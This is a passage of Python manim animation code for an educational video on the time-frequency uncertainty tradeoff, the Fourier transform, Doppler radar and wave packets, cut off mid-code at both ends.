0.1*RIGHT},\n run_time = 3,\n )\n self.play_student_changes(\"thinking\", \"erm\", \"sassy\")\n self.play(\n dot_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 0.1*RIGHT},\n vector_cloud.gaussian_distribution_wrapper.change_parameters,\n {\"sigma\" : 1*RIGHT},\n run_time = 3,\n )\n self.wait()\n\nclass FourierTradeoff(Scene):\n CONFIG = {\n \"show_text\" : True,\n \"complex_to_real_func\" : lambda z : z.real,\n \"widths\" : [6, 0.02, 1],\n }\n def construct(self):\n #Setup axes\n time_mean = 4\n time_axes = Axes(\n x_min = 0,\n x_max = 2*time_mean,\n x_axis_config = {\"unit_size\" : 1.5},\n y_min = -2, \n y_max = 2,\n y_axis_config = {\"unit_size\" : 0.5}\n )\n time_label = OldTexText(\"Time\")\n time_label.scale(1.5)\n time_label.next_to(\n time_axes.x_axis.get_right(), UP+LEFT,\n buff = MED_SMALL_BUFF,\n )\n time_axes.add(time_label)\n time_axes.center().to_edge(UP)\n time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))\n\n frequency_axes = Axes(\n x_min = 0,\n x_max 
= 8,\n x_axis_config = {\"unit_size\" : 1.5},\n y_min = -0.025,\n y_max = 0.075,\n y_axis_config = {\n \"unit_size\" : 30,\n \"tick_frequency\" : 0.025,\n },\n color = TEAL,\n )\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(1.5)\n frequency_label.next_to(\n frequency_axes.x_axis.get_right(), UP+LEFT,\n buff = MED_SMALL_BUFF, \n )\n frequency_label.set_color(FREQUENCY_COLOR)\n frequency_axes.add(frequency_label)\n frequency_axes.move_to(time_axes, LEFT)\n frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)\n frequency_axes.x_axis.add_numbers()\n\n # Graph information\n\n #x-coordinate of this point determines width of wave_packet graph\n width_tracker = ExponentialValueTracker(0.5)\n get_width = width_tracker.get_value\n\n def get_wave_packet_function():\n factor = 1./get_width()\n return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)\n\n def get_wave_packet():\n graph = time_axes.get_graph(\n get_wave_packet_function(),\n num_graph_points = 200,\n )\n graph.set_color(YELLOW)\n return graph\n\n time_radius = 10\n def get_wave_packet_fourier_transform():\n return get_fourier_graph(\n frequency_axes, \n get_wave_packet_function(),\n t_min = time_mean - time_radius,\n t_max = time_mean + time_radius,\n n_samples = 2*time_radius*17,\n complex_to_real_func = self.complex_to_real_func,\n color = FREQUENCY_COLOR,\n )\n\n wave_packet = get_wave_packet()\n wave_packet_update = UpdateFromFunc(\n wave_packet, \n lambda g : Transform(g, get_wave_packet()).update(1)\n )\n fourier_graph = get_wave_packet_fourier_transform()\n fourier_graph_update = UpdateFromFunc(\n fourier_graph, \n lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)\n )\n\n arrow = Arrow(\n wave_packet, frequency_axes.coords_to_point(\n 4, frequency_axes.y_max/2,\n ),\n color = FREQUENCY_COLOR,\n )\n fourier_words = OldTexText(\"Fourier Transform\")\n fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)\n sub_words = OldTexText(\"(To be explained shortly)\")\n sub_words.set_color(BLUE)\n sub_words.scale(0.75)\n sub_words.next_to(fourier_words, DOWN)\n\n #Draw items\n self.add(time_axes, frequency_axes)\n self.play(ShowCreation(wave_packet, rate_func = double_smooth))\n anims = [ReplacementTransform(\n wave_packet.copy(), fourier_graph\n )]\n if self.show_text:\n anims += [\n GrowArrow(arrow),\n Write(fourier_words, run_time = 1)\n ]\n self.play(*anims)\n # self.play(FadeOut(arrow))\n self.wait()\n for width in self.widths:\n self.play(\n width_tracker.set_value, width,\n wave_packet_update,\n fourier_graph_update,\n run_time = 3\n )\n if sub_words not in self.mobjects and self.show_text:\n self.play(FadeIn(sub_words))\n else:\n self.wait()\n self.wait()\n\nclass ShowPlan(PiCreatureScene):\n def construct(self):\n self.add_title()\n words = self.get_words()\n self.play_sound_anims(words[0])\n self.play_doppler_anims(words[1])\n self.play_quantum_anims(words[2])\n\n def add_title(self):\n title = OldTexText(\"The plan\")\n title.scale(1.5)\n title.to_edge(UP)\n h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)\n h_line.next_to(title, DOWN)\n self.add(title, h_line)\n\n def get_words(self):\n trips = [\n (\"sound waves\", \"(time vs. frequency)\", YELLOW),\n (\"Doppler radar\", \"(distance vs. velocity)\", GREEN),\n (\"quantum particles\", \"(position vs. 
momentum)\", BLUE),\n ]\n words = VGroup()\n for topic, tradeoff, color in trips:\n word = OldTexText(\"Uncertainty for\", topic, tradeoff)\n word[1:].set_color(color)\n word[2].scale(0.75)\n word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)\n words.add(word)\n words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)\n words.to_edge(LEFT)\n\n return words\n\n def play_sound_anims(self, word):\n morty = self.pi_creature\n wave = FunctionGraph(\n lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),\n x_min = 0, x_max = 30,\n step_size = 0.001,\n )\n wave.next_to(word, RIGHT)\n rect = BackgroundRectangle(wave, fill_opacity = 1)\n rect.stretch(2, 1)\n rect.next_to(wave, LEFT, buff = 0)\n always_shift(wave, direction=LEFT, rate=5)\n wave_fader = UpdateFromAlphaFunc(\n wave, \n lambda w, a : w.set_stroke(width = 3*a)\n )\n checkmark = self.get_checkmark(word)\n\n self.add(wave)\n self.add_foreground_mobjects(rect, word)\n self.play(\n Animation(word),\n wave_fader,\n morty.change, \"raise_right_hand\", word\n )\n self.wait(2)\n wave_fader.rate_func = lambda a : 1-smooth(a)\n self.add_foreground_mobjects(checkmark)\n self.play(\n Write(checkmark),\n morty.change, \"happy\",\n wave_fader, \n )\n self.remove_foreground_mobjects(rect, word)\n self.add(word)\n self.wait()\n\n def play_doppler_anims(self, word):\n morty = self.pi_creature\n\n radar_dish = RadarDish()\n radar_dish.next_to(word, DOWN, aligned_edge = LEFT)\n target = Plane()\n # target.match_height(radar_dish)\n target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)\n always_shift(target, direction = RIGHT, rate = 1.25)\n\n pulse = RadarPulse(radar_dish, target)\n\n checkmark = self.get_checkmark(word)\n\n self.add(target)\n self.play(\n Write(word),\n DrawBorderThenFill(radar_dish),\n UpdateFromAlphaFunc(\n target, lambda m, a : m.set_fill(opacity = a)\n ),\n morty.change, \"pondering\",\n run_time = 1\n )\n self.add(pulse)\n count = it.count() #TODO, this is not a great hack...\n while not pulse.is_finished() and next(count) < 15:\n self.play(\n morty.look_at, pulse.mobject,\n run_time = 0.5\n )\n self.play(\n Write(checkmark),\n UpdateFromAlphaFunc(\n target, lambda m, a : m.set_fill(opacity = 1-a)\n ),\n FadeOut(radar_dish),\n morty.change, \"happy\"\n )\n self.wait()\n\n def play_quantum_anims(self, word):\n morty = self.pi_creature\n dot_cloud = ProbabalisticDotCloud()\n gdw = dot_cloud.gaussian_distribution_wrapper\n gdw.next_to(word, DOWN, MED_LARGE_BUFF)\n gdw.rotate(5*DEGREES)\n gdw.save_state()\n gdw.scale(0)\n\n\n checkmark = self.get_checkmark(word)\n ish = OldTexText(\"$\\\\dots$ish\")\n ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)\n\n self.add(dot_cloud)\n self.play(\n Write(word),\n FadeIn(dot_cloud.mobject),\n morty.change, \"confused\",\n )\n self.play(gdw.restore, run_time = 2)\n self.play(Write(checkmark))\n self.wait()\n self.play(\n Write(ish), \n morty.change, 'maybe'\n )\n self.wait(6)\n\n\n ##\n\n def get_checkmark(self, word):\n checkmark = OldTex(\"\\\\checkmark\")\n checkmark.set_color(GREEN)\n checkmark.scale(1.25)\n checkmark.next_to(word[1], UP+RIGHT, buff = 0)\n return checkmark\n\nclass StartWithIntuition(TeacherStudentsScene):\n def construct(self):\n self.teacher_says(\n \"You already \\\\\\\\ have this \\\\\\\\ intuition\",\n bubble_config = {\n \"height\" : 3.5,\n \"width\" : 3,\n },\n )\n self.play_student_changes(\"pondering\", \"erm\", \"maybe\")\n self.look_at(VectorizedPoint(4*LEFT + 2*UP))\n self.wait(5)\n\nclass TwoCarsAtRedLight(Scene):\n CONFIG = {\n \"text_scale_val\" : 0.75,\n }\n def 
construct(self):\n self.pull_up_behind()\n self.flash_in_sync_short_time()\n self.show_low_confidence()\n self.flash_in_sync_long_time()\n self.show_high_confidence()\n\n def pull_up_behind(self):\n #Setup Traffic light\n traffic_light = TrafficLight()\n traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)\n source_point = VectorizedPoint(\n traffic_light[2].get_right()\n )\n screen = Line(ORIGIN, UP)\n screen.next_to(source_point, RIGHT, LARGE_BUFF)\n red_light = Spotlight(\n color = RED,\n source_point = source_point,\n radius = 0.5,\n screen = screen,\n num_levels = 20,\n opacity_function = lambda r : 1/(10*r**2+1)\n )\n red_light.fade(0.5)\n red_light.rotate(TAU/2, about_edge = LEFT)\n self.add(red_light, traffic_light)\n\n #Setup cars\n car1, car2 = cars = self.cars = VGroup(*[\n Car() for x in range(2)\n ])\n cars.arrange(RIGHT, buff = LARGE_BUFF)\n cars.next_to(\n traffic_light, LEFT, \n buff = LARGE_BUFF, aligned_edge = DOWN\n )\n car2.pi_creature.set_color(GREY_BROWN)\n car1.start_point = car1.get_corner(DOWN+RIGHT)\n car1.shift(FRAME_X_RADIUS*LEFT)\n\n #Pull up car\n self.add(cars)\n self.play(\n SwitchOn(\n red_light, \n rate_func = squish_rate_func(smooth, 0, 0.3),\n ),\n Animation(traffic_light),\n self.get_flashes(car2, num_flashes = 3),\n MoveCar(\n car1, car1.start_point,\n run_time = 3,\n rate_func = rush_from,\n )\n )\n\n def flash_in_sync_short_time(self):\n car1, car2 = cars = self.cars\n\n #Setup axes\n axes = Axes(\n x_min = 0,\n x_max = 5,\n y_min = 0, \n y_max = 2,\n y_axis_config = {\n \"tick_frequency\" : 0.5,\n },\n )\n axes.x_axis.add_numbers(1, 2, 3)\n time_label = OldTexText(\"Time\")\n time_label.scale(self.text_scale_val)\n time_label.next_to(axes.x_axis.get_right(), DOWN)\n y_title = OldTexText(\"Signal\")\n y_title.scale(self.text_scale_val)\n y_title.next_to(axes.y_axis, UP, SMALL_BUFF)\n axes.add(time_label, y_title)\n axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)\n graph = axes.get_graph(\n self.get_multispike_function(list(range(1, 4))),\n x_min = 0.8,\n x_max = 3.8,\n )\n graph.set_color(YELLOW)\n\n #Label short duration\n brace = Brace(Line(\n axes.input_to_graph_point(1, graph),\n axes.input_to_graph_point(3, graph),\n ), UP)\n text = OldTexText(\"Short duration observation\")\n text.scale(self.text_scale_val)\n text.next_to(brace, UP, SMALL_BUFF)\n text.align_to(\n axes.coords_to_point(0.25, 0), LEFT\n )\n\n\n self.play(\n self.get_flashes(car1, num_flashes = 2),\n self.get_flashes(car2, num_flashes = 2),\n LaggedStartMap(FadeIn, VGroup(\n axes, time_label, y_title,\n ))\n )\n self.play(\n self.get_flashes(car1, num_flashes = 3),\n self.get_flashes(car2, num_flashes = 3),\n ShowCreation(graph, rate_func=linear, run_time = 3)\n )\n self.play(\n self.get_flashes(car1, num_flashes = 10),\n self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),\n GrowFromCenter(brace),\n Write(text),\n )\n\n self.time_axes = axes\n self.time_graph = graph\n self.time_graph_label = VGroup(\n brace, text\n )\n\n def show_low_confidence(self):\n car1, car2 = cars = self.cars\n time_axes = self.time_axes\n\n #Setup axes\n frequency_axes = Axes(\n x_min = 0,\n x_max = 3,\n y_min = 0,\n y_max = 1.5,\n y_axis_config = {\n \"tick_frequency\" : 0.5,\n }\n )\n frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)\n frequency_axes.set_color(GREY_B)\n frequency_label = OldTexText(\"Frequency\")\n frequency_label.scale(self.text_scale_val)\n frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)\n frequency_axes.add(\n frequency_label,\n 
VectorizedPoint(frequency_axes.y_axis.get_top())\n )\n frequency_axes.x_axis.add_numbers(1, 2)\n frequency_graph = frequency_axes.get_graph(\n lambda x : np.exp(-4*(x-1)**2),\n x_min = 0,\n x_max = 2,\n )\n frequency_graph.set_color(RED)\n peak_point = frequency_axes.input_to_graph_point(\n 1, frequency_graph\n )\n\n #Setup label\n label = OldTexText(\"Low confidence\")\n label.scale(self.text_scale_val)\n label.move_to(peak_point + UP+RIGHT, DOWN)\n label.match_color(frequency_graph)\n arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)\n arrow.match_color(frequency_graph)\n\n self.play(\n ReplacementTransform(\n self.time_axes.copy(), frequency_axes\n ),\n ReplacementTransform(\n self.time_graph.copy(), frequency_graph\n ),\n )\n self.play(\n Write(label), \n GrowArrow(arrow)\n )\n self.wait()\n\n self.frequency_axes = frequency_axes\n self.frequency_graph = frequency_graph\n self.frequency_graph_label = VGroup(\n label, arrow\n )\n\n def flash_in_sync_long_time(self):\n time_graph = self.time_graph\n time_axes = self.time_axes\n frequency_graph = self.frequency_graph\n frequency_axes = self.frequency_axes\n\n n_spikes = 12\n new_time_graph = time_axes.get_graph(\n self.get_multispike_function(list(range(1, n_spikes+1))),\n x_min = 0.8,\n x_max = n_spikes + 0.8,\n )\n new_time_graph.match_color(time_graph)\n\n new_frequency_graph = frequency_axes.get_graph(\n lambda x : np.exp(-500*(x-1)**2),\n x_min = 0,\n x_max = 2,\n num_anchors = 500,\n )\n new_frequency_graph.match_color(self.frequency_graph)\n\n def pin_freq_graph_end_points(freq_graph):\n freq_graph.get_points()[0] = frequency_axes.coords_to_point(0, 0)\n freq_graph.get_points()[-1] = frequency_axes.coords_to_point(2, 0)\n\n self.play(LaggedStartMap(\n FadeOut, VGroup(\n self.time_graph_label,\n self.frequency_graph_label,\n self.time_graph,\n )\n ))\n self.play(\n ApplyMethod(\n self.time_axes.x_axis.stretch, 2.5, 0,\n {\"about_edge\" : LEFT},\n run_time = 4,\n rate_func = squish_rate_func(smooth, 0.3, 0.6),\n ),\n UpdateFromFunc(\n self.time_axes.x_axis.tip,\n lambda m : m.move_to(\n self.time_axes.x_axis.get_right(), \n LEFT\n )\n ),\n ShowCreation(\n new_time_graph,\n run_time = n_spikes,\n rate_func=linear,\n ),\n ApplyMethod(\n frequency_graph.stretch, 0.1, 0,\n run_time = n_spikes,\n ),\n UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),\n *[\n self.get_flashes(car, num_flashes = n_spikes)\n for car in self.cars\n ]\n )\n\n self.new_time_graph = new_time_graph\n self.new_frequency_graph = new_frequency_graph\n\n def show_high_confidence(self):\n #Frequency stuff\n arrow = self.frequency_graph_label[1]\n label = OldTexText(\"High confidence\")\n label.scale(self.text_scale_val)\n label.next_to(arrow.get_start(), UP, SMALL_BUFF)\n label.match_color(arrow)\n\n frequency_axes = self.frequency_axes\n\n #Time stuff\n new_time_graph = self.new_time_graph\n brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)\n text = OldTexText(\"Long duration observation\")\n text.scale(self.text_scale_val)\n text.next_to(brace, UP, buff = SMALL_BUFF)\n\n self.play(\n FadeIn(label),\n GrowArrow(arrow),\n *list(map(self.get_flashes, self.cars))\n )\n self.play(\n GrowFromCenter(brace),\n Write(text, run_time = 1),\n *list(map(self.get_flashes, self.cars))\n )\n self.play(*[\n self.get_flashes(car, num_flashes = 10)\n for car in self.cars\n ])\n\n ###\n\n def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):\n return AnimationGroup(*[\n MultipleFlashes(light, color, num_flashes = num_flashes, 
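# Aside: the point of TwoCarsAtRedLight is that the same blink rate, observed for
# longer, pins the frequency down more tightly. That can be checked numerically by
# correlating a spike train (same shape as the get_multispike_function helper below)
# against candidate frequencies and measuring how wide the response peak around the
# true rate of 1 blink/sec is. Sketch only; the grid and threshold are assumptions:
import numpy as np

def frequency_response(n_spikes, candidate_freqs, t=np.linspace(0, 15, 3000)):
    signal = sum(1.25 * np.exp(-100 * (t - m) ** 2) for m in range(1, n_spikes + 1))
    return np.array([
        abs(np.sum(signal * np.exp(-2j * np.pi * f * t)))
        for f in candidate_freqs
    ])

freqs = np.linspace(0.5, 1.5, 201)
for n_spikes in (3, 12):   # short vs long observation, as in the scene
    resp = frequency_response(n_spikes, freqs)
    # Width of the band within 50% of the peak: much narrower for 12 blinks.
    print(n_spikes, np.ptp(freqs[resp > 0.5 * resp.max()]))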
**kwargs)\n for light, color in zip(car.get_lights(), colors)\n ])\n\n def get_multispike_function(self, spike_times):\n return lambda x : sum([\n 1.25*np.exp(-100*(x-m)**2)\n for m in spike_times\n ])\n\nclass VariousMusicalNotes(Scene):\n def construct(self):\n freq = 20\n # x-coordinate of this point represents log(a)\n # where the bell curve component of the signal\n # is exp(-a*(x**2))\n graph_width_tracker = ExponentialValueTracker(1)\n def get_graph():\n a = graph_width_tracker.get_value()\n return FunctionGraph(\n lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,\n step_size = 0.001,\n )\n graph = get_graph()\n def graph_update(graph):\n graph.set_points(get_graph().get_points())\n graph_update_anim = UpdateFromFunc(graph, graph_update)\n def change_width_anim(width, **kwargs):\n a = 2.0/(width**2)\n return AnimationGroup(\n ApplyMethod(graph_width_tracker.set_value, a),\n graph_update_anim,\n **kwargs\n )\n change_width_anim(FRAME_X_RADIUS).update(1)\n graph_update_anim.update(0)\n\n phrases = [\n OldTexText(*words.split(\" \"))\n for words in [\n \"Very clear frequency\",\n \"Less clear frequency\",\n \"Extremely unclear frequency\",\n ]\n ]\n\n\n #Show graphs and phrases\n widths = [FRAME_X_RADIUS, 1, 0.2]\n for width, phrase in zip(widths, phrases):\n brace = Brace(Line(LEFT, RIGHT), UP)\n brace.stretch(width, 0)\n brace.next_to(graph.get_center(), UP, buff = 1.2)\n phrase.next_to(brace, UP)\n\n if width is widths[0]:\n self.play(ShowCreation(graph, rate_func=linear)),\n self.play(\n GrowFromCenter(brace),\n Write(phrase, run_time = 1)\n )\n else:\n self.play(\n change_width_anim(width),\n ReplacementTransform(\n VGroup(last_phrase, last_brace),\n VGroup(phrase, brace),\n rate_func = squish_rate_func(smooth, 0.5, 1),\n ),\n run_time = 2\n )\n self.wait()\n # self.play(*map(FadeOut, [graph, brace, phrase]))\n last_phrase = phrase\n last_brace = brace\n\n #Talk about correlations\n short_signal_words = OldTexText(\n \"Short\", \"signal\", \"correlates\",\n \"with\", \"wide range\", \"of frequencies\"\n )\n long_signal_words = OldTexText(\n \"Only\", \"wide\", \"signals\", \"correlate\",\n \"with a\", \"short range\", \"of frequencies\"\n )\n phrases = VGroup(short_signal_words, long_signal_words)\n for phrase in phrases:\n phrase.scale(0.8)\n phrase.set_color_by_tex_to_color_map({\n \"short\" : RED,\n \"long\" : GREEN,\n \"wide\" : GREEN,\n }, case_sensitive = False)\n phrases.arrange(DOWN)\n phrases.to_edge(UP)\n\n long_graph = FunctionGraph(\n lambda x : 0.5*np.sin(freq*x),\n x_min = -FRAME_WIDTH,\n x_max = FRAME_WIDTH,\n n_components = 0.001\n )\n long_graph.set_color(BLUE)\n long_graph.next_to(graph, UP, MED_LARGE_BUFF)\n\n self.play(\n ShowCreation(long_graph),\n *list(map(FadeOut, [last_brace, last_phrase]))\n )\n self.play(\n Write(short_signal_words),\n change_width_anim(widths[2])\n )\n self.play(\n long_graph.stretch, 0.35, 0,\n long_graph.set_color, GREEN,\n run_time = 5,\n rate_func = wiggle\n )\n self.wait()\n self.play(\n Write(long_signal_words),\n change_width_anim(widths[0]),\n )\n self.play(\n long_graph.stretch, 0.95, 0,\n long_graph.set_color, average_color(GREEN, BLUE),\n run_time = 4,\n rate_func = wiggle\n )\n self.wait()\n\nclass CrossOutDefinitenessAndCertainty(TeacherStudentsScene):\n def construct(self):\n words = VGroup(\n OldTexText(\"Definiteness\"),\n OldTexText(\"Certainty\"),\n )\n words.arrange(DOWN)\n words.next_to(self.teacher, UP+LEFT)\n crosses = VGroup(*list(map(Cross, words)))\n\n self.add(words)\n self.play(\n self.teacher.change, 
\"sassy\",\n ShowCreation(crosses[0])\n )\n self.play(\n self.change_students(*3*[\"erm\"]),\n ShowCreation(crosses[1])\n )\n self.wait(2)\n\nclass BringInFourierTranform(TeacherStudentsScene):\n def construct(self):\n fourier = OldTexText(\"Fourier\")\n fourier.scale(1.5)\n fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)\n fourier.save_state()\n fourier.shift(DOWN)\n fourier.fade(1)\n\n self.play(\n self.teacher.change, \"raise_right_hand\",\n fourier.restore\n )\n self.play_student_changes(\"happy\", \"erm\", \"confused\")\n self.look_at(3*LEFT + 2*UP)\n self.wait(3)\n\nclass LastVideoWrapper(Scene):\n def construct(self):\n title = OldTexText(\"Visualizing the Fourier Transform\")\n title.to_edge(UP)\n screen_rect = ScreenRectangle(height = 6)\n screen_rect.next_to(title, DOWN)\n\n self.add(title)\n self.play(ShowCreation(screen_rect))\n self.wait()\n\nclass FourierRecapScene(DrawFrequencyPlot):\n CONFIG = {\n \"frequency_axes_config\" : {\n \"x_max\" : 10.0,\n \"x_axis_config\" : {\n \"unit_size\" : 0.7,\n \"numbers_to_show\" : list(range(1, 10, 1)),\n }\n },\n \"initial_winding_frequency\" : 0.1,\n }\n def construct(self):\n self.setup_axes()\n self.preview_fourier_plot()\n self.wrap_signal_around_circle()\n self.match_winding_to_beat_frequency()\n self.follow_center_of_mass()\n self.draw_fourier_plot()\n self.set_color_spike()\n\n def setup_axes(self):\n self.remove(self.pi_creature)\n time_axes = self.get_time_axes()\n time_axes.to_edge(UP, buff = MED_SMALL_BUFF)\n time_axes.scale(0.9, about_edge = UP)\n frequency_axes = self.get_frequency_axes()\n circle_plane = self.get_circle_plane()\n\n self.add(time_axes)\n\n self.set_variables_as_attrs(\n time_axes, frequency_axes,\n circle_plane\n )\n\n def preview_fourier_plot(self):\n time_graph = self.graph = self.get_time_graph(\n width = 2,\n num_graph_points = 200,\n )\n fourier_graph = self.get_fourier_transform_graph(\n time_graph\n )\n fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)\n\n #labels\n signal_label = OldTexText(\"Signal\")\n fourier_label = OldTexText(\"Fourier transform\")\n signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)\n fourier_label.next_to(fourier_graph, UP)\n fourier_label.match_color(fourier_graph)\n\n self.play(\n ShowCreation(time_graph, run_time = 2),\n Write(signal_label),\n )\n self.wait()\n self.play(\n LaggedStartMap(FadeIn, self.frequency_axes),\n ReplacementTransform(\n time_graph.copy(),\n fourier_graph,\n run_time = 2\n ),\n ReplacementTransform(\n signal_label.copy(),\n fourier_label,\n run_time = 2,\n rate_func = squish_rate_func(smooth, 0.5, 1)\n ),\n )\n self.wait()\n self.play(LaggedStartMap(\n Indicate, self.frequency_axes.x_axis.numbers,\n run_time = 4,\n rate_func = wiggle,\n ))\n self.wait()\n self.play(*list(map(FadeOut, [\n self.frequency_axes, fourier_graph,\n signal_label, fourier_label,\n ])))\n\n self.time_graph = time_graph\n self.set_variables_as_attrs(time_graph, fourier_label)\n\n def wrap_signal_around_circle(self):\n time_graph = self.time_graph\n circle_plane = self.circle_plane\n freq = self.initial_winding_frequency\n pol_graph = self.get_polarized_mobject(time_graph, freq)\n winding_freq_label = self.get_winding_frequency_label()\n winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))\n winding_freq_label.move_to(circle_plane.get_top(), DOWN)\n\n self.add_foreground_mobjects(winding_freq_label)\n self.play(\n Write(circle_plane, run_time = 1),\n ReplacementTransform(\n time_graph.copy(), pol_graph,\n path_arc = -TAU/4,\n 
run_time_per_flash = 2,\n run_time = 2,\n ),\n FadeIn(winding_freq_label),\n )\n freq = 0.3\n self.change_frequency(freq, run_time = 2)\n ghost_pol_graph = pol_graph.copy()\n self.remove(pol_graph)\n self.play(ghost_pol_graph.set_stroke, {\"width\" : 0.5})\n self.play(\n *self.get_vector_animations(time_graph),\n run_time = 15\n )\n self.remove(ghost_pol_graph)\n self.wait()\n\n def match_winding_to_beat_frequency(self):\n self.v_lines_indicating_periods = self.get_v_lines_indicating_periods(0.3)\n self.add(self.v_lines_indicating_periods)\n for freq in range(1, 6):\n self.change_frequency(freq, run_time = 5)\n self.play(\n *self.get_vector_animations(\n self.time_graph,\n draw_polarized_graph = False\n ),\n run_time = 10\n )\n self.wait()\n\n def follow_center_of_mass(self):\n com_dot = self.get_center_of_mass_dot()\n self.generate_center_of_mass_dot_update_anim()\n com_arrow = Arrow(UP+3*RIGHT, ORIGIN)\n com_arrow.shift(com_dot.get_center())\n com_arrow.match_color(com_dot)\n com_words = OldTexText(\"Center of mass\")\n com_words.next_to(com_arrow.get_start(), UP)\n com_words.match_color(com_arrow)\n com_words.add_background_rectangle()\n\n com_dot.save_state()\n com_dot.move_to(com_arrow.get_start())\n com_dot.fade(1)\n\n self.play(\n com_dot.restore,\n GrowArrow(com_arrow, rate_func = squish_rate_func(smooth, 0.2, 1)),\n Write(com_words),\n )\n self.wait()\n squished_func = squish_rate_func(smooth, 0, 0.2)\n self.change_frequency(\n 4,\n added_anims = [\n FadeOut(com_arrow, rate_func = squished_func),\n FadeOut(com_words, rate_func = squished_func),\n ],\n run_time = 5\n )\n\n def draw_fourier_plot(self):\n frequency_axes = self.frequency_axes\n fourier_label = self.fourier_label\n\n self.change_frequency(0, run_time = 2)\n self.play(\n FadeIn(frequency_axes),\n FadeIn(fourier_label),\n )\n\n fourier_graph = self.get_fourier_transform_graph(self.time_graph)\n self.get_fourier_graph_drawing_update_anim(fourier_graph)\n self.generate_fourier_dot_transform(fourier_graph)\n\n self.change_frequency(5, run_time = 20)\n self.wait()\n self.change_frequency(7.5, run_time = 10)\n self.fourier_graph_drawing_update_anim = Animation(Mobject())\n self.fourier_graph = fourier_graph\n\n def set_color_spike(self):\n spike_point = self.frequency_axes.input_to_graph_point(\n 5, self.fourier_graph\n )\n circle = Circle(color = YELLOW, radius = 0.25)\n circle.move_to(spike_point)\n circle.save_state()\n circle.scale(5)\n circle.fade(1)\n\n self.change_frequency(5)\n self.play(circle.restore)\n self.play(FadeOut(circle))\n self.wait()\n for x in range(2):\n self.change_frequency(5.2, run_time = 3)\n self.change_frequency(4.8, run_time = 3)\n self.change_frequency(5, run_time = 1.5)\n self.wait()\n\n\n #########\n\n def get_time_graph(self, frequency = 5, width = 2, **kwargs):\n # low_x = center-width/2\n # high_x = center+width/2\n # new_smooth = lambda x : np.clip(smooth((x+0.5)), 0, 1)\n # def func(x):\n # pure_signal = 0.9*np.cos(TAU*frequency*x)\n # factor = new_smooth(x - low_x) - new_smooth(x-high_x)\n # return 1 + factor*pure_signal\n graph = self.time_axes.get_graph(\n lambda x : 1+0.9*np.cos(TAU*frequency*x),\n x_min = 0, x_max = width,\n **kwargs\n )\n graph.set_color(YELLOW)\n return graph\n\nclass RealPartOfInsert(Scene):\n def construct(self):\n words = OldTexText(\"(Real part of the)\")\n words.set_color(RED)\n self.add(words)\n self.play(Write(words))\n self.wait(5)\n\nclass CenterOfMassDescription(FourierRecapScene):\n def construct(self):\n self.remove(self.pi_creature)\n circle_plane = 
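# Aside: FourierRecapScene leans on the "winding machine" picture: wrap the signal
# g(t) around the origin at winding frequency f (i.e. plot g(t)*exp(-2*pi*i*f*t))
# and follow the wound curve's center of mass, which traces the Fourier transform
# up to scaling and the choice of real part. A minimal numpy version, with a test
# signal shaped like get_time_graph above (beat frequency 5, width 2):
import numpy as np

t = np.linspace(0, 2, 2000, endpoint=False)
g = 1 + 0.9 * np.cos(2 * np.pi * 5 * t)
for f in (2, 3, 4, 5, 6):
    com = (g * np.exp(-2j * np.pi * f * t)).mean()  # center of mass of the wound curve
    print(f, abs(com))  # near zero except at the winding frequency f = 5 (about 0.45)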
self.get_circle_plane()\n circle_plane.save_state()\n circle_plane.generate_target()\n circle_plane.target.set_height(FRAME_HEIGHT)\n circle_plane.target.center()\n circle_plane.target.axes.set_stroke(width = 2)\n circle_plane.target.main_lines.set_stroke(width = 2)\n circle_plane.target.secondary_lines.set_stroke(width = 1)\n\n start_coords = (0.5, 0.5)\n alt_coords = (0.8, 0.8)\n\n com_dot = Dot(color = self.center_of_mass_color)\n com_dot.move_to(circle_plane.coords_to_point(*start_coords))\n\n self.add(circle_plane, com_dot)\n self.wait()\n self.play(\n MoveToTarget(circle_plane),\n com_dot.move_to, \n circle_plane.target.coords_to_point(*start_coords)\n )\n self.wait()\n\n alt_com_dot = com_dot.copy().move_to(\n circle_plane.coords_to_point(*alt_coords)\n )\n\n for dot in com_dot, alt_com_dot:\n line = Line(ORIGIN, dot.get_center())\n line.match_color(com_dot)\n angle = line.get_angle()\n line.rotate(-angle, about_point = ORIGIN)\n brace = Brace(line, UP)\n words = brace.get_text(\"Strength of frequency\")\n words.add_background_rectangle()\n dot.length_label_group = VGroup(line, brace, words)\n dot.length_label_group.rotate(angle, about_point = ORIGIN)\n\n line, brace, words = com_dot.length_label_group\n self.play(\n GrowFromCenter(line),\n GrowFromCenter(brace),\n FadeIn(words),\n )\n self.wait()\n self.play(\n Transform(\n com_dot.length_label_group,\n alt_com_dot.length_label_group,\n ),\n Transform(com_dot, alt_com_dot),\n rate_func = there_and_back,\n run_time = 4,\n )\n\n #Do rotation\n line = com_dot.length_label_group[0]\n com_dot.length_label_group.remove(line)\n angle = line.get_angle()\n arc, alt_arc = [\n Arc(\n start_angle = 0, \n angle = factor*angle,\n radius = 0.5,\n )\n for factor in (1, 2)\n ]\n theta = OldTex(\"\\\\theta\")\n theta.shift(1.5*arc.point_from_proportion(0.5))\n\n self.play(\n 